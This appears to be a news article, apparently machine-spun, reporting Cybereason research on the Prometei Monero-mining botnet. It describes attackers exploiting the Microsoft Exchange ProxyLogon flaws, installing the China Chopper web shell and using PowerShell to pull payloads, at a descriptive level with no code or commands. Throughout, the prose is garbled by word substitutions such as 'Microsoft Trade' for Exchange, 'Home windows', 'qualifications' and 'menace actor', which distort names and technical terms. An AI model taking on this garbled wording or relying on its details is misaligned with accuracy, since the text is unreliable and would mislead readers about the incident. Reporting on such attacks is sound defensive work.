Attackers are exploiting the ProxyLogon Microsoft Exchange Server flaws to co-opt vulnerable machines to a cryptocurrency botnet named Prometei, according to new research.
“Prometei exploits the not long ago disclosed Microsoft Trade vulnerabilities affiliated with the HAFNIUM attacks to penetrate the network for malware deployment, credential harvesting and a lot more,” Boston-based mostly cybersecurity agency Cybereason claimed in an examination summarizing its conclusions.
To start with documented by Cisco Talos in July 2020, Prometei is a multi-modular botnet, with the actor behind the operation employing a broad selection of specially-crafted equipment and regarded exploits these types of as EternalBlue and BlueKeep to harvest qualifications, laterally propagate across the network and “maximize the total of methods collaborating in its Monero-mining pool.”
“Prometei has both Home windows-based mostly and Linux-Unix dependent versions, and it adjusts its payload based on the detected operating technique, on the specific contaminated machines when spreading across the network,” Cybereason senior danger researcher Lior Rochberger stated, adding it is “constructed to interact with four distinctive command-and-regulate (C2) servers which strengthens the botnet’s infrastructure and maintains continual communications, generating it additional resistant to takedowns.”
The intrusions acquire gain of the not long ago patched vulnerabilities in Microsoft Trade Servers with the target of abusing the processing power of the Windows devices to mine Monero.
In the assault sequence observed by the company, the adversary was uncovered exploiting Trade server flaws CVE-2021-27065 and CVE-2021-26858 as an preliminary compromise vector to set up the China Chopper internet shell and attain backdoor ingress to the community. With this accessibility in place, the menace actor released PowerShell to download the original Prometei payload from a distant server.
Modern variations of the bot module appear with backdoor abilities that assistance an substantial set of commands, such as supplemental modules termed “Microsoft Exchange Defender” that masquerade as authentic Microsoft merchandise that possible will take treatment of eradicating other competing web shells that could be set up on the machine so that Prometei will get access to the methods required to mine cryptocurrency successfully.
Curiously, recently unearthed proof gathered from VirusTotal artifacts has exposed that the botnet might have been around as early as May well 2016, implying that the malware has consistently been evolving ever since, introducing new modules and tactics to its capabilities.
Prometei has been noticed in a multitude of victims spanning throughout finance, insurance, retail, manufacturing, utilities, vacation, and building sectors, compromising networks of entities situated in the U.S., U.K., and various international locations in Europe, South The usa, and East Asia, whilst also explicitly averting infecting targets in former Soviet bloc nations.
Not significantly is identified about the attackers other than the fact that they are Russian talking, with older variations of Prometei getting their language code set as “Russian.” A different Tor consumer module utilized to talk with a Tor C2 server bundled a configuration file that is configured to steer clear of making use of numerous exit nodes found in Russia, Ukraine, Belarus, and Kazakhstan.
“Risk actors in the cybercrime neighborhood carry on to adopt APT-like procedures and boost efficiency of their operations,” Rochberger said. “As observed in the current Prometei attacks, the menace actors rode the wave of the not long ago uncovered Microsoft Trade vulnerabilities and exploited them in buy to penetrate qualified networks.”
“This risk poses a terrific danger for companies, because the attackers have absolute regulate over the contaminated equipment, and if they desire so, they can steal info, infect the endpoints with other malware or even collaborate with ransomware gangs by providing the access to the contaminated endpoints,” she included.